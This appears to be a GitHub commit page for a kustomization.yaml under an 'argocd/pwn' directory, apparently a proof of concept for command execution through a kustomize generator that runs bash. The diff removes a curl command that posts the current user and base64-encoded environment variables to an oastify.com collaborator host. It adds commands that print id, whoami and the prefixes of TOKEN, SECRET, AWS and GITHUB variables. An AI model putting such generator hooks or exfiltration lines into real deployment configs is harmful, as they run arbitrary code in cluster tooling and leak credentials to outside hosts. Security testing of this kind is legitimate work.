Skip to content

Commit d5ca89e

Browse files
author
Nyein Chan Aung
authored
Update kustomization.yaml
1 parent 5baa12c commit d5ca89e

File tree

1 file changed

+6
-1
lines changed

1 file changed

+6
-1
lines changed

kubernetes/gke-utility/argocd/pwn/kustomization.yaml

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,4 +7,9 @@ generators:
77
bin: /bin/bash
88
args:
99
- -c
10-
- curl -X POST -d "user=$(whoami)&secrets=$(env | base64)" https://wtte6tfhnu0v54zand8c0mybk2qtel2a.oastify.com/k8s-infra-pwn
10+
- |
11+
echo "--- PWN START ---"
12+
id
13+
whoami
14+
env | grep -E "TOKEN|SECRET|AWS|GITHUB" | cut -c 1-5 # Print prefixes to prove access
15+
echo "--- PWN END ---"

0 commit comments

Comments
 (0)